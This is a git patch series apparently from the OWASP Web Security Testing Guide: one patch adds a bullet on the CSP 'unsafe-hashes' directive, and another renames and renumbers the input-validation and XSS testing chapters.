From 4434ff6c8ee435ede1adeb607a9a96bf04b52060 Mon Sep 17 00:00:00 2001
From: Manindar Mohan <manu.m@beaglesecurity.com>
Date: Sun, 3 Jul 2022 12:56:39 +0530
Subject: [PATCH 01/37] insecure configuration of CSP when using the
 unsafe-hashes directive

---
 .../12-Test_for_Content_Security_Policy.md                       | 1 +
 1 file changed, 1 insertion(+)

diff --git a/document/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/12-Test_for_Content_Security_Policy.md b/document/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/12-Test_for_Content_Security_Policy.md
index 7e5c75977c..a1d69d06a0 100644
--- a/document/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/12-Test_for_Content_Security_Policy.md
+++ b/document/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/12-Test_for_Content_Security_Policy.md
@@ -20,6 +20,7 @@ To test for misconfigurations in CSPs, look for insecure configurations by exami
 
 - `unsafe-inline` directive enables inline scripts or styles making the applications susceptible to XSS attacks.
 - `unsafe-eval` directive allows `eval()` to be used in the application.
+- `unsafe-hashes` directive allows us to provide inline code, by computing a SHA-256 hash of our code.
 - Resources such as scripts can be allowed to be loaded from any origin by the use wildcard (`*`) source.
     - Also consider wildcards based on partial matches, such as: `https://*` or `*.cdn.com`.
     - Consider whether allow listed sources provide JSONP endpoints which might be used to bypass CSP or same-origin-policy.

From 17f7b86746d7507a6e8f3816354bb2af0235debf Mon Sep 17 00:00:00 2001
From: Manindar Mohan <manu@mario.local>
Date: Fri, 30 Jun 2023 15:04:43 +0530
Subject: [PATCH 02/37] Moved all XSS to chapter 11, client-side testing, and
 have one big section for XSS and then going into more tests for other types
 of testing.

---
 ... => 01-Testing_for_HTTP_Verb_Tampering.md} |   2 +-
 ...2-Testing_for_HTTP_Parameter_Pollution.md} |   2 +-
 ...ion.md => 03-Testing_for_SQL_Injection.md} |   2 +-
 ...r_Oracle.md => 03.1-Testing_for_Oracle.md} |   0
 ...for_MySQL.md => 03.2-Testing_for_MySQL.md} |   0
 ...rver.md => 03.3-Testing_for_SQL_Server.md} |   0
 ...stgreSQL.md => 03.4-Testing_PostgreSQL.md} |   0
 ...ccess.md => 03.5-Testing_for_MS_Access.md} |   0
 ...md => 03.6-Testing_for_NoSQL_Injection.md} |   0
 ...n.md => 03.7-Testing_for_ORM_Injection.md} |   0
 ...ide.md => 03.8-Testing_for_Client-side.md} |   0
 ...on.md => 04-Testing_for_LDAP_Injection.md} |   2 +-
 ...ion.md => 05-Testing_for_XML_Injection.md} |   2 +-
 ...ion.md => 06-Testing_for_SSI_Injection.md} |   2 +-
 ...n.md => 07-Testing_for_XPath_Injection.md} |   2 +-
 ... => 08-Testing_for_IMAP_SMTP_Injection.md} |   2 +-
 ...on.md => 09-Testing_for_Code_Injection.md} |   2 +-
 ....md => 09.1-Testing_for_File_Inclusion.md} |   0
 ...md => 10-Testing_for_Command_Injection.md} |   2 +-
 ...w.md => 11-Testing_for_Buffer_Overflow.md} |   2 +-
 ...12-Testing_for_Format_String_Injection.md} |   2 +-
 ...13-Testing_for_Incubated_Vulnerability.md} |   2 +-
 ...4-Testing_for_HTTP_Splitting_Smuggling.md} |   2 +-
 ... 15-Testing_for_HTTP_Incoming_Requests.md} |   2 +-
 ...> 16-Testing_for_Host_Header_Injection.md} |   2 +-
 ...ing_for_Server-side_Template_Injection.md} |   2 +-
 ...esting_for_Server-Side_Request_Forgery.md} |   2 +-
 ...t.md => 19-Testing_for_Mass_Assignment.md} |   2 +-
 .../01-Testing_for_Cross_Site_Scripting.md    | 109 ++++++++++++++++++
 ...ing_for_Reflected_Cross_Site_Scripting.md} |   4 -
 ...esting_for_Stored_Cross_Site_Scripting.md} |   4 -
 ...ing_for_DOM-based_Cross_Site_Scripting.md} |  17 ++-
 ...or_Self_DOM_Based_Cross_Site_Scripting.md} |   0
 .../images/Alert.png                          | Bin
 .../images/Stored_input_example.jpg           | Bin
 .../images/Stored_xss_example.jpg             | Bin
 .../images/XSS_Example1.png                   | Bin
 .../images/XSS_Example2.png                   | Bin
 38 files changed, 135 insertions(+), 37 deletions(-)
 rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{03-Testing_for_HTTP_Verb_Tampering.md => 01-Testing_for_HTTP_Verb_Tampering.md} (93%)
 rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{04-Testing_for_HTTP_Parameter_Pollution.md => 02-Testing_for_HTTP_Parameter_Pollution.md} (99%)
 rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{05-Testing_for_SQL_Injection.md => 03-Testing_for_SQL_Injection.md} (99%)
 rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{05.1-Testing_for_Oracle.md => 03.1-Testing_for_Oracle.md} (100%)
 rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{05.2-Testing_for_MySQL.md => 03.2-Testing_for_MySQL.md} (100%)
 rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{05.3-Testing_for_SQL_Server.md => 03.3-Testing_for_SQL_Server.md} (100%)
 rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{05.4-Testing_PostgreSQL.md => 03.4-Testing_PostgreSQL.md} (100%)
 rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{05.5-Testing_for_MS_Access.md => 03.5-Testing_for_MS_Access.md} (100%)
 rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{05.6-Testing_for_NoSQL_Injection.md => 03.6-Testing_for_NoSQL_Injection.md} (100%)
 rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{05.7-Testing_for_ORM_Injection.md => 03.7-Testing_for_ORM_Injection.md} (100%)
 rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{05.8-Testing_for_Client-side.md => 03.8-Testing_for_Client-side.md} (100%)
 rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{06-Testing_for_LDAP_Injection.md => 04-Testing_for_LDAP_Injection.md} (99%)
 rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{07-Testing_for_XML_Injection.md => 05-Testing_for_XML_Injection.md} (99%)
 rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{08-Testing_for_SSI_Injection.md => 06-Testing_for_SSI_Injection.md} (99%)
 rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{09-Testing_for_XPath_Injection.md => 07-Testing_for_XPath_Injection.md} (99%)
 rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{10-Testing_for_IMAP_SMTP_Injection.md => 08-Testing_for_IMAP_SMTP_Injection.md} (99%)
 rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{11-Testing_for_Code_Injection.md => 09-Testing_for_Code_Injection.md} (99%)
 rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{11.1-Testing_for_File_Inclusion.md => 09.1-Testing_for_File_Inclusion.md} (100%)
 rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{12-Testing_for_Command_Injection.md => 10-Testing_for_Command_Injection.md} (99%)
 rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{13-Testing_for_Buffer_Overflow.md => 11-Testing_for_Buffer_Overflow.md} (85%)
 rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{13-Testing_for_Format_String_Injection.md => 12-Testing_for_Format_String_Injection.md} (99%)
 rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{14-Testing_for_Incubated_Vulnerability.md => 13-Testing_for_Incubated_Vulnerability.md} (99%)
 rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{15-Testing_for_HTTP_Splitting_Smuggling.md => 14-Testing_for_HTTP_Splitting_Smuggling.md} (99%)
 rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{16-Testing_for_HTTP_Incoming_Requests.md => 15-Testing_for_HTTP_Incoming_Requests.md} (99%)
 rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{17-Testing_for_Host_Header_Injection.md => 16-Testing_for_Host_Header_Injection.md} (99%)
 rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{18-Testing_for_Server-side_Template_Injection.md => 17-Testing_for_Server-side_Template_Injection.md} (99%)
 rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{19-Testing_for_Server-Side_Request_Forgery.md => 18-Testing_for_Server-Side_Request_Forgery.md} (99%)
 rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{20-Testing_for_Mass_Assignment.md => 19-Testing_for_Mass_Assignment.md} (99%)
 create mode 100644 document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_Cross_Site_Scripting.md
 rename document/4-Web_Application_Security_Testing/{07-Input_Validation_Testing/01-Testing_for_Reflected_Cross_Site_Scripting.md => 11-Client-side_Testing/01.1-Testing_for_Reflected_Cross_Site_Scripting.md} (99%)
 rename document/4-Web_Application_Security_Testing/{07-Input_Validation_Testing/02-Testing_for_Stored_Cross_Site_Scripting.md => 11-Client-side_Testing/01.2-Testing_for_Stored_Cross_Site_Scripting.md} (99%)
 rename document/4-Web_Application_Security_Testing/11-Client-side_Testing/{01-Testing_for_DOM-based_Cross_Site_Scripting.md => 01.3-Testing_for_DOM-based_Cross_Site_Scripting.md} (97%)
 rename document/4-Web_Application_Security_Testing/11-Client-side_Testing/{01.1-Testing_for_Self_DOM_Based_Cross_Site_Scripting.md => 01.4-Testing_for_Self_DOM_Based_Cross_Site_Scripting.md} (100%)
 rename document/4-Web_Application_Security_Testing/{07-Input_Validation_Testing => 11-Client-side_Testing}/images/Alert.png (100%)
 rename document/4-Web_Application_Security_Testing/{07-Input_Validation_Testing => 11-Client-side_Testing}/images/Stored_input_example.jpg (100%)
 rename document/4-Web_Application_Security_Testing/{07-Input_Validation_Testing => 11-Client-side_Testing}/images/Stored_xss_example.jpg (100%)
 rename document/4-Web_Application_Security_Testing/{07-Input_Validation_Testing => 11-Client-side_Testing}/images/XSS_Example1.png (100%)
 rename document/4-Web_Application_Security_Testing/{07-Input_Validation_Testing => 11-Client-side_Testing}/images/XSS_Example2.png (100%)

diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03-Testing_for_HTTP_Verb_Tampering.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/01-Testing_for_HTTP_Verb_Tampering.md
similarity index 93%
rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03-Testing_for_HTTP_Verb_Tampering.md
rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/01-Testing_for_HTTP_Verb_Tampering.md
index 5c47fbcbc4..6b919f4940 100644
--- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03-Testing_for_HTTP_Verb_Tampering.md
+++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/01-Testing_for_HTTP_Verb_Tampering.md
@@ -2,6 +2,6 @@
 
 |ID          |
 |------------|
-|WSTG-INPV-03|
+|WSTG-INPV-01|
 
 This content has been merged into: [Test HTTP Methods](../02-Configuration_and_Deployment_Management_Testing/06-Test_HTTP_Methods.md)
diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/04-Testing_for_HTTP_Parameter_Pollution.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/02-Testing_for_HTTP_Parameter_Pollution.md
similarity index 99%
rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/04-Testing_for_HTTP_Parameter_Pollution.md
rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/02-Testing_for_HTTP_Parameter_Pollution.md
index d2eb39b136..64b6a048e3 100644
--- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/04-Testing_for_HTTP_Parameter_Pollution.md
+++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/02-Testing_for_HTTP_Parameter_Pollution.md
@@ -2,7 +2,7 @@
 
 |ID          |
 |------------|
-|WSTG-INPV-04|
+|WSTG-INPV-02|
 
 ## Summary
 
diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03-Testing_for_SQL_Injection.md
similarity index 99%
rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection.md
rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03-Testing_for_SQL_Injection.md
index d4a8620dd9..26ca0c5afb 100644
--- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection.md
+++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03-Testing_for_SQL_Injection.md
@@ -2,7 +2,7 @@
 
 |ID          |
 |------------|
-|WSTG-INPV-05|
+|WSTG-INPV-03|
 
 ## Summary
 
diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.1-Testing_for_Oracle.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.1-Testing_for_Oracle.md
similarity index 100%
rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.1-Testing_for_Oracle.md
rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.1-Testing_for_Oracle.md
diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.2-Testing_for_MySQL.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.2-Testing_for_MySQL.md
similarity index 100%
rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.2-Testing_for_MySQL.md
rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.2-Testing_for_MySQL.md
diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.3-Testing_for_SQL_Server.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.3-Testing_for_SQL_Server.md
similarity index 100%
rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.3-Testing_for_SQL_Server.md
rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.3-Testing_for_SQL_Server.md
diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.4-Testing_PostgreSQL.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.4-Testing_PostgreSQL.md
similarity index 100%
rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.4-Testing_PostgreSQL.md
rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.4-Testing_PostgreSQL.md
diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.5-Testing_for_MS_Access.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.5-Testing_for_MS_Access.md
similarity index 100%
rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.5-Testing_for_MS_Access.md
rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.5-Testing_for_MS_Access.md
diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.6-Testing_for_NoSQL_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.6-Testing_for_NoSQL_Injection.md
similarity index 100%
rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.6-Testing_for_NoSQL_Injection.md
rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.6-Testing_for_NoSQL_Injection.md
diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.7-Testing_for_ORM_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.7-Testing_for_ORM_Injection.md
similarity index 100%
rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.7-Testing_for_ORM_Injection.md
rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.7-Testing_for_ORM_Injection.md
diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.8-Testing_for_Client-side.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.8-Testing_for_Client-side.md
similarity index 100%
rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.8-Testing_for_Client-side.md
rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.8-Testing_for_Client-side.md
diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/06-Testing_for_LDAP_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/04-Testing_for_LDAP_Injection.md
similarity index 99%
rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/06-Testing_for_LDAP_Injection.md
rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/04-Testing_for_LDAP_Injection.md
index f54732cdba..959cdb2f60 100644
--- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/06-Testing_for_LDAP_Injection.md
+++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/04-Testing_for_LDAP_Injection.md
@@ -2,7 +2,7 @@
 
 |ID          |
 |------------|
-|WSTG-INPV-06|
+|WSTG-INPV-04|
 
 ## Summary
 
diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/07-Testing_for_XML_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_XML_Injection.md
similarity index 99%
rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/07-Testing_for_XML_Injection.md
rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_XML_Injection.md
index 0851f313b1..c5ce735377 100644
--- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/07-Testing_for_XML_Injection.md
+++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_XML_Injection.md
@@ -2,7 +2,7 @@
 
 |ID          |
 |------------|
-|WSTG-INPV-07|
+|WSTG-INPV-05|
 
 ## Summary
 
diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/08-Testing_for_SSI_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/06-Testing_for_SSI_Injection.md
similarity index 99%
rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/08-Testing_for_SSI_Injection.md
rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/06-Testing_for_SSI_Injection.md
index 31368ae723..18770d07bf 100644
--- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/08-Testing_for_SSI_Injection.md
+++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/06-Testing_for_SSI_Injection.md
@@ -2,7 +2,7 @@
 
 |ID          |
 |------------|
-|WSTG-INPV-08|
+|WSTG-INPV-06|
 
 ## Summary
 
diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/09-Testing_for_XPath_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/07-Testing_for_XPath_Injection.md
similarity index 99%
rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/09-Testing_for_XPath_Injection.md
rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/07-Testing_for_XPath_Injection.md
index 03e97236b0..03faadfbef 100644
--- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/09-Testing_for_XPath_Injection.md
+++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/07-Testing_for_XPath_Injection.md
@@ -2,7 +2,7 @@
 
 |ID          |
 |------------|
-|WSTG-INPV-09|
+|WSTG-INPV-07|
 
 ## Summary
 
diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/10-Testing_for_IMAP_SMTP_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/08-Testing_for_IMAP_SMTP_Injection.md
similarity index 99%
rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/10-Testing_for_IMAP_SMTP_Injection.md
rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/08-Testing_for_IMAP_SMTP_Injection.md
index d46bac9b01..6b856ced34 100644
--- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/10-Testing_for_IMAP_SMTP_Injection.md
+++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/08-Testing_for_IMAP_SMTP_Injection.md
@@ -2,7 +2,7 @@
 
 |ID          |
 |------------|
-|WSTG-INPV-10|
+|WSTG-INPV-08|
 
 ## Summary
 
diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11-Testing_for_Code_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/09-Testing_for_Code_Injection.md
similarity index 99%
rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11-Testing_for_Code_Injection.md
rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/09-Testing_for_Code_Injection.md
index 6cd3381630..3172c942b2 100644
--- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11-Testing_for_Code_Injection.md
+++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/09-Testing_for_Code_Injection.md
@@ -2,7 +2,7 @@
 
 |ID          |
 |------------|
-|WSTG-INPV-11|
+|WSTG-INPV-09|
 
 ## Summary
 
diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_File_Inclusion.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/09.1-Testing_for_File_Inclusion.md
similarity index 100%
rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_File_Inclusion.md
rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/09.1-Testing_for_File_Inclusion.md
diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Command_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/10-Testing_for_Command_Injection.md
similarity index 99%
rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Command_Injection.md
rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/10-Testing_for_Command_Injection.md
index 260654ff24..afd6456cc1 100644
--- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Command_Injection.md
+++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/10-Testing_for_Command_Injection.md
@@ -2,7 +2,7 @@
 
 |ID          |
 |------------|
-|WSTG-INPV-12|
+|WSTG-INPV-10|
 
 ## Summary
 
diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/13-Testing_for_Buffer_Overflow.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11-Testing_for_Buffer_Overflow.md
similarity index 85%
rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/13-Testing_for_Buffer_Overflow.md
rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11-Testing_for_Buffer_Overflow.md
index 9c1ba53a6a..c836db469a 100644
--- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/13-Testing_for_Buffer_Overflow.md
+++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11-Testing_for_Buffer_Overflow.md
@@ -2,6 +2,6 @@
 
 |ID          |
 |------------|
-|WSTG-INPV-13|
+|WSTG-INPV-11|
 
 This content has been removed
diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/13-Testing_for_Format_String_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Format_String_Injection.md
similarity index 99%
rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/13-Testing_for_Format_String_Injection.md
rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Format_String_Injection.md
index 94ffcd128d..83c8fab689 100644
--- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/13-Testing_for_Format_String_Injection.md
+++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Format_String_Injection.md
@@ -2,7 +2,7 @@
 
 |ID          |
 |------------|
-|WSTG-INPV-13|
+|WSTG-INPV-12|
 
 ## Summary
 
diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/14-Testing_for_Incubated_Vulnerability.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/13-Testing_for_Incubated_Vulnerability.md
similarity index 99%
rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/14-Testing_for_Incubated_Vulnerability.md
rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/13-Testing_for_Incubated_Vulnerability.md
index 1decb9bef8..90a0c49897 100644
--- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/14-Testing_for_Incubated_Vulnerability.md
+++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/13-Testing_for_Incubated_Vulnerability.md
@@ -2,7 +2,7 @@
 
 |ID          |
 |------------|
-|WSTG-INPV-14|
+|WSTG-INPV-13|
 
 ## Summary
 
diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/15-Testing_for_HTTP_Splitting_Smuggling.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/14-Testing_for_HTTP_Splitting_Smuggling.md
similarity index 99%
rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/15-Testing_for_HTTP_Splitting_Smuggling.md
rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/14-Testing_for_HTTP_Splitting_Smuggling.md
index 9e59abd0a6..cac1f31858 100644
--- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/15-Testing_for_HTTP_Splitting_Smuggling.md
+++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/14-Testing_for_HTTP_Splitting_Smuggling.md
@@ -2,7 +2,7 @@
 
 |ID          |
 |------------|
-|WSTG-INPV-15|
+|WSTG-INPV-14|
 
 ## Summary
 
diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/16-Testing_for_HTTP_Incoming_Requests.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/15-Testing_for_HTTP_Incoming_Requests.md
similarity index 99%
rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/16-Testing_for_HTTP_Incoming_Requests.md
rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/15-Testing_for_HTTP_Incoming_Requests.md
index 4634b43736..06387a92a4 100644
--- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/16-Testing_for_HTTP_Incoming_Requests.md
+++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/15-Testing_for_HTTP_Incoming_Requests.md
@@ -2,7 +2,7 @@
 
 |ID          |
 |------------|
-|WSTG-INPV-16|
+|WSTG-INPV-15|
 
 ## Summary
 
diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Host_Header_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/16-Testing_for_Host_Header_Injection.md
similarity index 99%
rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Host_Header_Injection.md
rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/16-Testing_for_Host_Header_Injection.md
index 71ae8f4006..f4ddb93132 100644
--- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Host_Header_Injection.md
+++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/16-Testing_for_Host_Header_Injection.md
@@ -2,7 +2,7 @@
 
 |ID          |
 |------------|
-|WSTG-INPV-17|
+|WSTG-INPV-16|
 
 ## Summary
 
diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server-side_Template_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Server-side_Template_Injection.md
similarity index 99%
rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server-side_Template_Injection.md
rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Server-side_Template_Injection.md
index b3995bb444..f4e49e31f9 100644
--- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server-side_Template_Injection.md
+++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Server-side_Template_Injection.md
@@ -2,7 +2,7 @@
 
 |ID          |
 |------------|
-|WSTG-INPV-18|
+|WSTG-INPV-17|
 
 ## Summary
 
diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Server-Side_Request_Forgery.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server-Side_Request_Forgery.md
similarity index 99%
rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Server-Side_Request_Forgery.md
rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server-Side_Request_Forgery.md
index f1b57d958e..21047359fd 100644
--- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Server-Side_Request_Forgery.md
+++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server-Side_Request_Forgery.md
@@ -2,7 +2,7 @@
 
 |ID          |
 |------------|
-|WSTG-INPV-19|
+|WSTG-INPV-18|
 
 ## Summary
 
diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/20-Testing_for_Mass_Assignment.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Mass_Assignment.md
similarity index 99%
rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/20-Testing_for_Mass_Assignment.md
rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Mass_Assignment.md
